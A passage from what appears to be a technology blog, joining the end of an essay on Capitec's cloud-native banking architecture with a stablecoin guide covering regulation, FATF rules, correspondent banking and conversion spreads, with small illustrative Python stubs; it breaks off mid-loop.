Java 25 introduces mature virtual threading as a first class concurrency model. This fundamentally changes how high concurrency systems behave under load.

Virtual threads decouple application concurrency from operating system threads. Instead of being constrained by a limited pool of heavyweight threads, services can handle hundreds of thousands of concurrent blocking operations without exhausting resources.

Request handling becomes simpler. Engineers can write straightforward blocking code without introducing thread pool starvation or complex asynchronous control flow.

Tail latency improves under load. When traffic spikes, virtual threads queue cheaply rather than collapsing the system through thread exhaustion.

Failure isolation improves. Slow downstream calls no longer monopolise scarce threads, reducing cascading failure modes.

Operationally, virtual threads align naturally with containerised, autoscaling environments. Concurrency scales with demand, not with preconfigured thread limits.

When combined with modern garbage collectors and ahead of time optimisation, virtual threading removes an entire class of concurrency related instability that plagued earlier JVM based banking platforms.

8. Nimbleness Emerges When Entanglement Disappears

When blast zones and integration choke points disappear, teams regain the ability to move quickly without increasing systemic risk.

Domains communicate through well defined RESTful interfaces, often across separate AWS accounts, enforcing isolation as a first class property. A failure in one domain does not cascade across the organisation.

To keep this operable at scale, Capitec uses Backstage (via an internal overlay called ODIN) as its internal orchestration and developer platform. All AWS accounts, services, pipelines, and operational assets are created to a common standard. Teams consume platform capability rather than inventing infrastructure.

This eliminates configuration drift, reduces cognitive load, and ensures that every new product inherits the same security, observability, and resilience characteristics.

The result is nimbleness without fragility.

9. Operational Stability Is Observability Plus Action

In entangled systems, failures are discovered by clients and stability is measured retrospectively.

Capitec operates differently. End to end observability through Instana and its in house AI platform, Neo, correlates client side errors, network faults, infrastructure signals, and transaction failures in real time. Issues are detected as they emerge, not after they cascade.

This operational awareness allows teams to intervene early, contain issues quickly, and reduce client impact before failures escalate.

Stability, in this model, is not the absence of failure. It is fast detection, rapid containment, and decisive response.

10. Fraud Prevention Without Creating New Entanglement

Fraud is treated as a first class stability concern rather than an external control.

Payments are evaluated inline as they move through the bank. Abnormal velocity, behavioural anomalies, and account provenance are assessed continuously. Even fraud reported in the call center is immediately visible to other clients paying from the Capitec App. Clients are presented with conscience pricking prompts for high risk payments; these frequently stop fraud as the clients abandon the payment when presented with the risks.

Capitec runs a real time malware detection engine directly on client devices. This engine detects hooks and overlays installed by malicious applications. When malware is identified, the client’s account is immediately stopped, preventing fraudulent transactions before they occur.

Because fraud controls are embedded directly into the transaction flow, they don’t introduce additional coupling or asynchronous failure modes.

The impact is measurable. Capitec’s fraud prevention systems have prevented R300 million in client losses from fraud. In November alone, these systems saved clients a further R60 million in fraud losses.

11. The Myth of Stability Through Multicloud

Multicloud is often presented as a stability strategy. In practice, it is largely a myth.

Running across multiple cloud providers does not remove failure risk. It compounds it. Cross cloud communication can typically only be secured using IP based controls, weakening security posture. Operational complexity increases sharply as teams must reason about heterogeneous platforms, tooling, failure modes, and networking behaviour.

Most critically, multicloud does not eliminate correlated failure. If either cloud provider becomes unavailable, systems are usually unusable anyway. The result is a doubled risk surface, increased operational risk, and new inter cloud network dependencies (without a corresponding reduction in outage impact).

Multicloud increases complexity, weakens controls, and expands risk surface area without delivering meaningful resilience.

12. What Actually Improves Stability

There are better options than multicloud.

Hybrid cloud with anti-affinity on critical channels is one. For example, card rails can be placed in two physically separate data centres so that if cloud based digital channels are unavailable, clients can still transact via cards and ATMs. This provides real functional resilience rather than architectural illusion.

Multi region deployment within a single cloud provider is another. This provides geographic fault isolation without introducing heterogeneous complexity. However, this only works if the provider avoids globally scoped services that introduce hidden single points of failure. At present, only AWS consistently supports this model. Some providers expose global services (such as global front doors) that introduce global blast radius and correlated failure risk.

True resilience requires isolation of failure domains, not duplication of platforms.

13. Why Traditional Banks Still Struggle

Traditional banks remain constrained by entangled product graphs, vertically scaled cores, synchronous integration models, and architectural decisions from a different era. As product portfolios grow, quantum entanglement increases. Change slows, recovery degrades, and outages become harder to diagnose and contain.

Modernisation programmes often increase entanglement temporarily through dual run architectures, making systems more fragile before they become more stable (if they ever do).

The challenge is not talent or ambition. It is the accumulated cost of entanglement.

14. Stability at Scale Without the Traditional Trade Off

Capitec’s significance is not that it is small. It is that it is large and remains stable.

Despite operating at massive scale with a broad product surface and high transaction volumes, stability improves rather than degrades. Scale does not increase blast radius, recovery time, or change risk. It increases parallelism, isolation, and resilience.

This directly contradicts historical banking patterns where growth inevitably led to fragility. Capitec demonstrates that with the right architecture, scale and stability are no longer opposing forces.

15. Final Thought

Before cloud and autoscaling, scale and stability were inversely related. The more products a bank had, the more entangled and fragile it became.

In 2025, that relationship can be reversed (but only by breaking entanglement, isolating failure domains, and avoiding complexity masquerading as resilience).

Doing a deal with a cloud provider means nothing if transformation stalls inside the organisation. If dozens of people carry the title of CIO while quietly pulling the handbrake on the change that is required, the outcome is inevitable regardless of vendor selection.

There is also a strategic question that many institutions avoid. If forced to choose between operating in a jurisdiction that is hostile to public cloud or accessing the full advantages of cloud, waiting is not a strategy. When that jurisdiction eventually allows public cloud, the market will already be populated by banks that moved earlier, built cloud native platforms, and are now entering at scale.

Capitec is an engineering led bank whose stability and speed increase with scale. Traditional banks remain constrained by quantum entanglement baked into architectures from a different era.

These outcomes are not accidental. They are the inevitable result of architectural and organisational choices made years ago, now playing out under real world load.


Stablecoins: A Comprehensive Guide

1. What Are Stablecoins?

Stablecoins are a type of cryptocurrency designed to maintain a stable value by pegging themselves to a reserve asset, typically a fiat currency like the US dollar. Unlike volatile cryptocurrencies such as Bitcoin or Ethereum, which can experience dramatic price swings, stablecoins aim to provide the benefits of digital currency without the price volatility.

The most common types of stablecoins include:

Fiat collateralized stablecoins are backed by traditional currencies held in reserve at a 1:1 ratio. Examples include Tether (USDT) and USD Coin (USDC), which maintain reserves in US dollars or dollar equivalent assets.

Crypto collateralized stablecoins use other cryptocurrencies as collateral, often over collateralized to account for volatility. DAI is a prominent example, backed by Ethereum and other crypto assets.

Algorithmic stablecoins attempt to maintain their peg through automated supply adjustments based on market demand, without traditional collateral backing. These have proven to be the most controversial and risky category.

2. Why Do Stablecoins Exist?

Stablecoins emerged to solve several critical problems in both traditional finance and the cryptocurrency ecosystem.

In the crypto world, they provide a stable store of value and medium of exchange. Traders use stablecoins to move in and out of volatile positions without converting back to fiat currency, avoiding the delays and fees associated with traditional banking. They serve as a safe harbor during market turbulence and enable seamless transactions across different blockchain platforms.

For cross border payments and remittances, stablecoins offer significant advantages over traditional methods. International transfers that typically take days and cost substantial fees can be completed in minutes for a fraction of the cost. This makes them particularly valuable for workers sending money to families in other countries or businesses conducting international trade.

Stablecoins also address financial inclusion challenges. In countries with unstable currencies or limited banking infrastructure, they provide access to a stable digital currency that can be held and transferred using just a smartphone. This opens up financial services to the unbanked and underbanked populations worldwide.

2.1 How Do Stablecoins Move Money?

Stablecoins move between countries by riding on public or permissioned blockchains rather than correspondent banking rails. When a sender in one country initiates a payment, their bank or payment provider converts local currency into a regulated stablecoin (for example a USD or EUR backed token) and sends that token directly to the recipient bank’s blockchain address. The transaction settles globally in minutes with finality provided by the blockchain, not by intermediaries. To participate, a bank joins a stablecoin network by becoming an authorised issuer or distributor, integrating custody and wallet infrastructure, and connecting its core banking systems to blockchain rails via APIs. On the receiving side, the bank accepts the stablecoin, performs compliance checks (KYC, AML, sanctions screening), and redeems it back into local currency for the client’s account. Because value moves as tokens on chain rather than as messages between correspondent banks, there is no need for SWIFT messaging, nostro/vostro accounts, or multi-day settlement, resulting in faster, cheaper, and more transparent cross border payments.
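
To make that flow concrete, here is a heavily simplified sketch of the steps. Every function is a stand-in for a real integration (issuer APIs, custody, compliance tooling, core banking); the names and 1:1 assumptions are illustrative only:

# Simplified model of a stablecoin cross-border payment; all steps are stubs.
import uuid

def mint_stablecoin(usd_amount: float) -> float:
    return usd_amount                       # 1:1 issuance against reserves

def transfer_on_chain(tokens: float, recipient_wallet: str) -> str:
    return uuid.uuid4().hex                 # pretend transaction hash; settles in minutes

def compliance_checks(tx_hash: str) -> None:
    pass                                    # KYC / AML / sanctions screening

def redeem_to_fiat(tokens: float) -> float:
    return tokens                           # 1:1 redemption into local currency

def send_cross_border_payment(amount_local: float, fx_to_usd: float,
                              recipient_wallet: str) -> str:
    tokens = mint_stablecoin(amount_local * fx_to_usd)     # convert and tokenise
    return transfer_on_chain(tokens, recipient_wallet)     # no correspondent chain

def receive_cross_border_payment(tx_hash: str, tokens: float) -> float:
    compliance_checks(tx_hash)
    return redeem_to_fiat(tokens)                          # credit the client account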

If a bank does not want the operational and regulatory burden of running its own digital asset custody, it can partner with specialist technology and infrastructure providers that offer custody, wallet management, compliance tooling, and blockchain connectivity as managed services. In this model, the bank retains the customer relationship and regulatory accountability, while the tech partner handles private key security, smart-contract interaction, transaction monitoring, and network operations under strict service-level and audit agreements. Commonly used players in this space include Fireblocks and Copper for institutional custody and secure transaction orchestration; Anchorage Digital and BitGo for regulated custody and settlement services; Circle for stablecoin issuance and on-/off-ramps (USDC); Coinbase Institutional for custody and liquidity; and Stripe or Visa for fiat to stablecoin on-ramps and payment integration. This partnership approach allows banks to move quickly into stablecoin based cross-border payments without rebuilding their core infrastructure or taking on unnecessary operational risk.

3. How Do Stablecoins Make Money?

Stablecoin issuers have developed several revenue models that can be remarkably profitable.

The primary revenue source for fiat backed stablecoins is interest on reserves. When issuers hold billions of dollars in US Treasury bills or other interest bearing assets backing their stablecoins, they earn substantial returns. For instance, with interest rates at 5%, a stablecoin issuer with $100 billion in reserves could generate $5 billion annually while still maintaining the 1:1 peg. Users typically receive no interest on their stablecoin holdings, allowing issuers to pocket the entire yield.
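
The reserve yield arithmetic in that example is simply reserves multiplied by the prevailing rate:

# Illustrative figures from the paragraph above, not actual issuer data.
reserves_usd = 100_000_000_000   # $100 billion held in T-bills and equivalents
rate = 0.05                      # 5% interest rate environment
print(f"Annual reserve income: ${reserves_usd * rate:,.0f}")   # $5,000,000,000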

Transaction fees represent another revenue stream. While often minimal, the sheer volume of stablecoin transactions generates significant income. Some issuers charge fees for minting (creating) or redeeming stablecoins, particularly for large institutional transactions.

Premium services for institutional clients provide additional revenue. Banks, payment processors, and large enterprises often pay for faster settlement, higher transaction limits, dedicated support, and integration services.

Many stablecoin platforms also generate revenue through their broader ecosystem. This includes charging fees on decentralized exchanges, lending protocols, or other financial services built around the stablecoin.

3.1 The Pendle Revenue Model: Yield Trading Innovation

Pendle represents an innovative evolution in the DeFi stablecoin ecosystem through its yield trading protocol. Rather than issuing stablecoins directly, Pendle creates markets for trading future yield on stablecoin deposits and other interest bearing assets.

The Pendle revenue model operates through several mechanisms. The protocol charges trading fees on its automated market makers (AMMs), typically around 0.1% to 0.3% per swap. When users trade yield tokens on Pendle’s platform, a portion of these fees goes to the protocol treasury while another portion rewards liquidity providers who supply capital to the trading pools.

Pendle’s unique approach involves splitting interest bearing tokens into two components: the principal token (PT) representing the underlying asset, and the yield token (YT) representing the future interest. This separation allows sophisticated users to speculate on interest rates, hedge yield exposure, or lock in fixed returns on their stablecoin holdings.
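
As a rough illustration of why that split enables fixed returns: PT redeems for 1.0 unit of the underlying at maturity, so buying it at a discount locks in an implied fixed rate. The numbers and helper below are hypothetical, not Pendle’s actual pricing or API:

# Hypothetical PT pricing example: the discount to the 1.0 maturity value
# implies an annualised fixed rate for whoever holds PT to maturity.
def implied_fixed_rate(pt_price: float, days_to_maturity: int) -> float:
    return (1.0 / pt_price - 1.0) * (365 / days_to_maturity)

# A PT bought at 0.97 with 180 days to maturity locks in roughly 6.3% annualised.
print(f"{implied_fixed_rate(0.97, 180):.2%}")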

The protocol generates revenue through swap fees, redemption fees when tokens mature, and potential governance token value capture as the protocol grows. This model demonstrates how stablecoin adjacent services can create profitable businesses by adding layers of financial sophistication on top of basic stablecoin infrastructure. Pendle particularly benefits during periods of high interest rates, when demand for yield trading increases and the potential returns from separating yield rights become more valuable.

4. Security and Fraud Concerns

Stablecoins face several critical security and fraud challenges that potential users and regulators must consider.

Reserve transparency and verification remain the most significant concern. Issuers must prove they actually hold the assets backing their stablecoins. Several controversies have erupted when stablecoin companies failed to provide clear, audited proof of reserves. The risk is that an issuer might not have sufficient backing, leading to a bank run scenario where the peg collapses and users cannot redeem their coins.

Smart contract vulnerabilities pose technical risks. Stablecoins built on blockchain platforms rely on code that, if flawed, can be exploited by hackers. Major hacks have resulted in hundreds of millions of dollars in losses, and once stolen, blockchain transactions are typically irreversible.

Regulatory uncertainty creates ongoing challenges. Different jurisdictions treat stablecoins differently, and the lack of clear, consistent regulation creates risks for both issuers and users. There’s potential for sudden regulatory action that could freeze assets or shut down operations.

Counterparty risk is inherent in centralized stablecoins. Users must trust the issuing company to maintain reserves, operate honestly, and remain solvent. If the company fails or acts fraudulently, users may lose their funds with limited recourse.

The algorithmic stablecoin model has proven particularly vulnerable. The catastrophic collapse of TerraUSD in 2022, which lost over $40 billion in value, demonstrated that algorithmic mechanisms can fail spectacularly under market stress, creating devastating losses for holders.

Money laundering and sanctions evasion concerns have drawn regulatory scrutiny. The pseudonymous nature of cryptocurrency transactions makes stablecoins attractive for illicit finance, though blockchain’s transparent ledger also makes transactions traceable with proper tools and cooperation.

4.1 Monitoring Stablecoin Flows

Effective monitoring of stablecoin flows has become critical for financial institutions, regulators, and the issuers themselves to ensure compliance, detect fraud, and understand market dynamics.

On Chain Analytics Tools provide the foundation for stablecoin monitoring. Since most stablecoins operate on public blockchains, every transaction is recorded and traceable. Companies like Chainalysis, Elliptic, and TRM Labs specialize in blockchain analytics, offering platforms that track stablecoin movements across wallets and exchanges. These tools can identify patterns, flag suspicious activities, and trace funds through complex transaction chains.

Real Time Transaction Monitoring systems alert institutions to potentially problematic flows. These systems track large transfers, unusual transaction patterns, rapid movement between exchanges (potentially indicating wash trading or manipulation), and interactions with known illicit addresses. Financial institutions integrating stablecoins must implement monitoring comparable to traditional payment systems.

Wallet Clustering and Entity Attribution techniques help identify the real world entities behind blockchain addresses. By analyzing transaction patterns, timing, and common input addresses, analytics firms can cluster related wallets and often attribute them to specific exchanges, services, or even individuals. This capability is crucial for understanding who holds stablecoins and where they’re being used.

Reserve Monitoring and Attestation focuses on the issuer side. Independent auditors and blockchain analysis firms track the total supply of stablecoins and verify that corresponding reserves exist. Circle, for instance, publishes monthly attestations from accounting firms. Some advanced monitoring systems provide real time transparency by linking on chain supply data with bank account verification.

Cross Chain Tracking has become essential as stablecoins exist across multiple blockchains. USDC and USDT operate on Ethereum, Tron, Solana, and other chains, requiring monitoring solutions that aggregate data across these ecosystems to provide a complete picture of flows.

Market Intelligence and Risk Assessment platforms combine on chain data with off chain information to assess concentration risk, identify potential market manipulation, and provide early warning of potential instability. When a small number of addresses hold large stablecoin positions, it creates systemic risk that monitoring can help quantify.

Banks and financial institutions implementing stablecoins typically deploy a combination of commercial blockchain analytics platforms, custom monitoring systems, and compliance teams trained in cryptocurrency investigation. The goal is achieving the same level of financial crime prevention and risk management that exists in traditional banking while adapting to the unique characteristics of blockchain technology.

5. How Regulators View Stablecoins

Regulatory attitudes toward stablecoins vary significantly across jurisdictions, but common themes and concerns have emerged globally.

United States Regulatory Approach involves multiple agencies with overlapping jurisdictions. The Securities and Exchange Commission (SEC) has taken the position that some stablecoins may be securities, particularly those offering yield or governed by investment contracts. The Commodity Futures Trading Commission (CFTC) views certain stablecoins as commodities. The Treasury Department and the Financial Stability Oversight Council have identified stablecoins as potential systemic risks requiring bank like regulation.

Proposed legislation in the US Congress has sought to create a comprehensive framework requiring stablecoin issuers to maintain high quality liquid reserves, submit to regular audits, and potentially obtain banking charters or trust company licenses. The regulatory preference is clearly toward treating major stablecoin issuers as financial institutions subject to banking supervision.

European Union Regulation has taken a more structured approach through the Markets in Crypto Assets (MiCA) regulation, which came into effect in 2024. MiCA establishes clear requirements for stablecoin issuers including reserve asset quality standards, redemption rights for holders, capital requirements, and governance standards. The regulation distinguishes between smaller stablecoin operations and “significant” stablecoins that require more stringent oversight due to their systemic importance.

United Kingdom Regulators are developing a framework that treats stablecoins used for payments as similar to traditional payment systems. The Bank of England and Financial Conduct Authority have indicated that stablecoin issuers should meet standards comparable to commercial banks, including holding reserves in central bank accounts or high quality government securities.

Asian Regulatory Perspectives vary widely. Singapore’s Monetary Authority has created a licensing regime for stablecoin issuers focused on reserve management and redemption guarantees. Hong Kong is developing similar frameworks. China has banned private stablecoins entirely while developing its own central bank digital currency. Japan requires stablecoin issuers to be licensed banks or trust companies.

Key Regulatory Concerns consistently include systemic risk (the failure of a major stablecoin could trigger broader financial instability), consumer protection (ensuring holders can redeem stablecoins for fiat currency), anti money laundering compliance, reserve adequacy and quality, concentration risk in the Treasury market (if stablecoin reserves significantly increase holdings of government securities), and the potential for stablecoins to facilitate capital flight or undermine monetary policy.

Central Bank Digital Currencies (CBDCs) represent a regulatory response to private stablecoins. Many central banks are developing or piloting digital currencies partly to provide a public alternative to private stablecoins, allowing governments to maintain monetary sovereignty while capturing the benefits of digital currency.

The regulatory trend is clearly toward treating stablecoins as systemically important financial infrastructure requiring oversight comparable to banks or payment systems, with an emphasis on reserve quality, redemption rights, and anti money laundering compliance.

5.1 How Stablecoins Impact the Correspondent Banking Model

Stablecoins pose both opportunities and existential challenges to the traditional correspondent banking system that has dominated international payments for decades.

The Traditional Correspondent Banking Model relies on a network of banking relationships where banks hold accounts with each other to facilitate international transfers. When a business in Brazil wants to pay a supplier in Thailand, the payment typically flows through multiple intermediary banks, each taking fees and adding delays. This system involves currency conversion, compliance checks at multiple points, and settlement risk, making international payments slow and expensive.

Stablecoins as Direct Competition offer a fundamentally different model. A business can send USDC directly to a recipient anywhere in the world in minutes, bypassing the correspondent banking network entirely. The recipient can then convert to local currency through a local exchange or payment processor. This disintermediation threatens the fee generating correspondent banking relationships that have been profitable for banks, particularly in remittance corridors and business to business payments.

Cost and Speed Advantages are significant. Traditional correspondent banking involves fees at multiple layers, often totaling 3-7% for remittances and 1-3% for business payments, with settlement taking 1-5 days. Stablecoin transfers can cost less than 1% including conversion fees, with settlement in minutes. This efficiency gap puts pressure on banks to either adopt stablecoin technology or risk losing payment volume.

The Disintermediation Threat extends beyond just payments. Correspondent banking generates substantial revenue for major international banks through foreign exchange spreads, service fees, and liquidity management. If businesses and individuals can hold and transfer value in stablecoins, they become less dependent on banks for international transactions. This is particularly threatening in high volume, low margin corridors where efficiency matters most.

Banks Adapting Through Integration represents one response to this threat. Rather than being displaced, some banks are incorporating stablecoins into their service offerings. They can issue their own stablecoins, partner with stablecoin issuers to provide on ramps and off ramps, or offer custody and transaction services for corporate clients wanting to use stablecoins. JPMorgan’s JPM Coin exemplifies this approach, using blockchain technology and stablecoin principles for institutional payments within a bank controlled system.

The Hybrid Model Emerging in practice combines stablecoins with traditional banking. Banks provide the fiat on ramps and off ramps, regulatory compliance, customer relationships, and local currency conversion, while stablecoins handle the actual transfer of value. This partnership model allows banks to maintain their customer relationships and regulatory compliance role while capturing efficiency gains from blockchain technology.

Regulatory Arbitrage Concerns arise because stablecoins can sometimes operate with less regulatory burden than traditional correspondent banking. Banks face extensive anti money laundering requirements, capital requirements, and regulatory scrutiny. If stablecoins provide similar services with lighter regulation, they gain a competitive advantage that regulators are increasingly seeking to eliminate through tighter stablecoin oversight.

Settlement Risk and Liquidity Management change fundamentally with stablecoins. Traditional correspondent banking requires banks to maintain nostro accounts (accounts held in foreign banks) prefunded with liquidity. Stablecoins allow for near instant settlement without prefunding requirements, potentially freeing up billions in trapped liquidity that banks currently must maintain across the correspondent network.

The long term impact will likely involve correspondent banking evolving rather than disappearing. Banks will increasingly serve as regulated gateways between fiat currency and stablecoins, while stablecoins handle the actual transfer of value. The most vulnerable players are mid tier correspondent banks that primarily provide routing services without strong customer relationships or value added services.

5.2 How FATF Standards Apply to Stablecoins

The Financial Action Task Force (FATF) provides international standards for combating money laundering and terrorist financing, and these standards have been extended to cover stablecoins and other virtual assets.

The Travel Rule represents the most significant FATF requirement affecting stablecoins. Originally designed for traditional wire transfers, the Travel Rule requires that information about the originator and beneficiary of transfers above a certain threshold (typically $1,000) must travel with the transaction. For stablecoins, this means that Virtual Asset Service Providers (VASPs) such as exchanges, wallet providers, and payment processors must collect and transmit customer information when facilitating stablecoin transfers.

Implementing the Travel Rule on public blockchains creates technical challenges. While bank wire transfers pass through controlled systems where information can be attached, blockchain transactions are peer to peer and pseudonymous. The industry has developed solutions like the Travel Rule Information Sharing Architecture (TRISA) and other protocols that allow VASPs to exchange customer information securely off chain while the stablecoin transaction occurs on chain.
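
Putting those two paragraphs together, a minimal sketch of the gating logic looks like this. The threshold, field names, and helper are illustrative, not any VASP’s or TRISA’s actual API:

# Illustrative Travel Rule gate: identifying information accompanies the
# transfer metadata exchanged between VASPs off chain; only the token movement
# itself is recorded on chain.
from dataclasses import dataclass

TRAVEL_RULE_THRESHOLD_USD = 1_000   # common threshold cited in FATF guidance

@dataclass
class Party:
    name: str
    wallet_or_account: str

def build_transfer_record(amount_usd: float, originator: Party,
                          beneficiary: Party) -> dict:
    record = {"amount_usd": amount_usd,
              "beneficiary_wallet": beneficiary.wallet_or_account}
    if amount_usd >= TRAVEL_RULE_THRESHOLD_USD:
        record["travel_rule_data"] = {
            "originator": vars(originator),
            "beneficiary": vars(beneficiary),
        }
    return record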

Know Your Customer (KYC) and Customer Due Diligence requirements apply to any entity that provides services for stablecoin transactions. Exchanges, wallet providers, and payment processors must verify customer identities, assess risk levels, and maintain records of transactions. This requirement creates a tension with the permissionless nature of blockchain technology, where anyone can hold a self hosted wallet and transact directly without intermediaries.

VASP Registration and Licensing is required in most jurisdictions following FATF guidance. Any business providing stablecoin custody, exchange, or transfer services must register with financial authorities, implement anti money laundering programs, and submit to regulatory oversight. This has created significant compliance burdens for smaller operators and driven consolidation toward larger, well capitalized platforms.

Stablecoin Issuers as VASPs are generally classified as Virtual Asset Service Providers under FATF standards, subjecting them to the full range of anti money laundering and counter terrorist financing obligations. This includes transaction monitoring, suspicious activity reporting, and sanctions screening. Major issuers like Circle and Paxos have built sophisticated compliance programs comparable to traditional financial institutions.

The Self Hosted Wallet Challenge represents a key friction point. FATF has expressed concern about transactions involving self hosted (non custodial) wallets where users control their own private keys without intermediary oversight. Some jurisdictions have proposed restricting or requiring enhanced due diligence for transactions between VASPs and self hosted wallets, though this remains controversial and difficult to enforce technically.

Cross Border Coordination is essential but challenging. Stablecoins operate globally and instantly, but regulatory enforcement is jurisdictional. FATF promotes information sharing between national financial intelligence units and encourages mutual legal assistance. However, gaps in enforcement across jurisdictions create opportunities for regulatory arbitrage, where bad actors operate from jurisdictions with weak oversight.

Sanctions Screening is mandatory for stablecoin service providers. They must screen transactions against lists of sanctioned individuals, entities, and countries maintained by organizations like the US Office of Foreign Assets Control (OFAC). Several stablecoin issuers have demonstrated the ability to freeze funds in wallets associated with sanctioned addresses, showing that even decentralized systems can implement centralized controls when required by law.

Risk Based Approach is fundamental to FATF methodology. Service providers must assess the money laundering and terrorist financing risks specific to their operations and implement controls proportionate to those risks. For stablecoins, this means considering factors like transaction volumes, customer types, geographic exposure, and the underlying blockchain’s anonymity features.

Challenges in Implementation are significant. The pseudonymous nature of blockchain transactions makes it difficult to identify ultimate beneficial owners. The speed and global reach of stablecoin transfers compress the time window for intervention. The prevalence of decentralized exchanges and peer to peer transactions creates enforcement gaps. Some argue that excessive regulation will drive activity to unregulated platforms or privacy focused cryptocurrencies, making financial crime harder rather than easier to detect.

The FATF framework essentially attempts to impose traditional financial system controls on a technology designed to operate without intermediaries. While large, regulated stablecoin platforms can implement these requirements, the tension between regulatory compliance and the permissionless nature of blockchain technology remains unresolved and continues to drive both technological innovation and regulatory evolution.

6. Good Use Cases for Stablecoins

Despite the risks, stablecoins excel in several legitimate applications that offer clear advantages over traditional alternatives.

Cross border payments and remittances benefit enormously from stablecoins. Workers sending money home can avoid high fees and long delays, with transactions settling in minutes rather than days. Businesses conducting international trade can reduce costs and streamline operations significantly.

Treasury management for crypto native companies provides a practical use case. Cryptocurrency exchanges, blockchain projects, and Web3 companies need stable assets for operations while staying within the crypto ecosystem. Stablecoins let them hold working capital without exposure to crypto volatility.

Decentralized finance (DeFi) applications rely heavily on stablecoins. They enable lending and borrowing, yield farming, liquidity provision, and trading without the complications of volatile assets. Users can earn interest on stablecoin deposits or use them as collateral for loans.

Hedging against local currency instability makes stablecoins valuable in countries experiencing hyperinflation or currency crises. Citizens can preserve purchasing power by holding dollar backed stablecoins instead of rapidly devaluing local currencies.

Programmable payments and smart contracts benefit from stablecoins. Businesses can automate payments based on conditions (such as releasing funds when goods are received) or create subscription services, escrow arrangements, and other complex payment structures that execute automatically.
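
As a toy illustration of that conditional release idea (a real implementation would live in a smart contract on chain; this Python model and its names are purely illustrative):

# Escrow sketch: funds are released only when the delivery condition is met.
from dataclasses import dataclass

@dataclass
class Escrow:
    buyer: str
    seller: str
    amount_stablecoin: float
    goods_received: bool = False
    released: bool = False

    def confirm_delivery(self) -> None:
        self.goods_received = True

    def release(self) -> float:
        if not self.goods_received:
            raise ValueError("Condition not met: goods not yet received")
        self.released = True
        return self.amount_stablecoin

escrow = Escrow(buyer="importer", seller="exporter", amount_stablecoin=25_000.0)
escrow.confirm_delivery()
print(escrow.release())   # 25000.0 paid out automatically once the condition holds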

Ecommerce and online payments increasingly accept stablecoins as they combine the low fees of cryptocurrency with price stability. This is particularly valuable for digital goods, online services, and merchant payments where volatility would be problematic.

6.1 Companies Specializing in Banking Stablecoin Integration

Several companies have emerged as leaders in helping traditional banks launch and integrate stablecoin solutions into their existing infrastructure.

Paxos is a regulated blockchain infrastructure company that provides white label stablecoin solutions for financial institutions. They’ve partnered with major companies to issue stablecoins and offer compliance focused infrastructure that meets banking regulatory requirements. Paxos handles the technical complexity while allowing banks to maintain their customer relationships.

Circle offers comprehensive business account services and APIs that enable banks to integrate USD Coin (USDC) into their platforms. Their developer friendly tools and banking partnerships have made them a go to provider for institutions wanting to offer stablecoin services. Circle emphasizes regulatory compliance and transparency with regular reserve attestations.

Fireblocks provides institutional grade infrastructure for banks looking to offer digital asset services, including stablecoins. Their platform handles custody, treasury operations, and connectivity to various blockchains, allowing banks to offer stablecoin functionality without building everything from scratch.

Taurus specializes in digital asset infrastructure for banks, wealth managers, and other financial institutions in Europe. They provide technology for custody, tokenization, and trading that enables traditional financial institutions to offer stablecoin services within existing regulatory frameworks.

Sygnum operates as a Swiss digital asset bank and offers banking as a service solutions. They help other banks integrate digital assets including stablecoins while ensuring compliance with Swiss banking regulations. Their approach combines traditional banking security with blockchain innovation.

Ripple has expanded beyond its cryptocurrency focus to offer enterprise blockchain solutions for banks, including infrastructure for stablecoin issuance and cross border payment solutions. Their partnerships with financial institutions worldwide position them as a bridge between traditional banking and blockchain technology.

BBVA and JPMorgan have also developed proprietary solutions (JPM Coin for JPMorgan) that other institutions might license or use as models, though these are typically more focused on their own operations and select partners.

7. The Bid Offer Spread Challenge: Liquidity vs. True 1:1 Conversions

One of the hidden costs in stablecoin adoption that significantly impacts user economics is the bid offer spread applied during conversions between fiat currency and stablecoins. While stablecoins are designed to maintain a 1:1 peg with their underlying asset (typically the US dollar), the reality of converting between fiat and crypto introduces market dynamics that can erode this theoretical parity.

7.1 Understanding the Spread Problem

When users convert fiat currency to stablecoins or vice versa through most platforms, they encounter a bid offer spread: the difference between the buying price and the selling price. Even though USDC or USDT theoretically equals $1.00, a platform might effectively charge $1.008 to buy a stablecoin and offer only $0.992 when selling it back. This 0.8% to 1.5% spread represents a significant friction cost, particularly for businesses making frequent conversions or moving large amounts.
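To make the arithmetic concrete, here is a small Python sketch using the hypothetical quotes above ($1.008 to buy, $0.992 to sell). The numbers are illustrative, not any specific platform's pricing.

# Hypothetical quotes around a $1.00 peg (not any specific platform's pricing)
buy_price = 1.008    # fiat paid per stablecoin when buying
sell_price = 0.992   # fiat received per stablecoin when selling

buy_markup = (buy_price - 1.00) * 100        # 0.8% above the peg
sell_discount = (1.00 - sell_price) * 100    # 0.8% below the peg

fiat_in = 10_000.00
coins = fiat_in / buy_price                  # convert fiat to stablecoins
fiat_out = coins * sell_price                # immediately convert back
round_trip_cost = fiat_in - fiat_out

print(f"Buy markup: {buy_markup:.1f}%, sell discount: {sell_discount:.1f}%")
print(f"Round trip on ${fiat_in:,.0f}: ${round_trip_cost:,.2f} lost "
      f"({round_trip_cost / fiat_in * 100:.2f}%)")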

This spread exists because most platforms operate market making models where they must maintain liquidity on both sides of the transaction. Holding inventory of both fiat and stablecoins involves costs: capital tied up in reserves, exposure to brief depegging events, regulatory compliance overhead, and the operational expense of managing banking relationships for fiat on ramps and off ramps. Platforms traditionally recover these costs through the spread rather than explicit fees.

For cryptocurrency exchanges and most fintech platforms, the spread also serves as their primary revenue mechanism for stablecoin conversions. When a platform facilitates thousands or millions of conversions daily, even small spreads generate substantial income. The spread compensates for the risk that during periods of market stress, stablecoins might temporarily trade below their peg, leaving the platform holding depreciated assets.

7.2 The Impact on Users and Business Operations

The cumulative effect of bid offer spreads becomes particularly painful for certain use cases. Small and medium sized businesses operating across borders face multiple conversion points: exchanging local currency to USD, converting USD to stablecoins for cross border transfer, then converting stablecoins back to USD or local currency at the destination. Each conversion compounds the cost, potentially consuming 2% to 4% of the transaction value when combined with traditional banking fees.

For businesses using stablecoins as working capital (converting payroll, managing treasury operations, or settling international invoices), the spread can eliminate much of the cost advantage that stablecoins are supposed to provide over traditional correspondent banking. A company converting $100,000 might effectively pay $1,500 in spread costs on a round trip conversion, comparable to the traditional wire transfer fees that stablecoins aimed to disrupt.
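A rough sketch of how the conversion legs compound is below. The per-leg costs are assumptions chosen to fall within the ranges discussed above, not real quotes.

# Illustrative conversion chain for a cross border payment; per-leg costs
# are assumptions for the sake of arithmetic, not real quotes.
legs = {
    "local currency -> USD": 0.010,    # 1.0% FX margin
    "USD -> stablecoin":     0.0075,   # 0.75% spread
    "stablecoin -> USD":     0.0075,   # 0.75% spread
    "USD -> local currency": 0.010,    # 1.0% FX margin
}

amount = 100_000.0
for leg, cost in legs.items():
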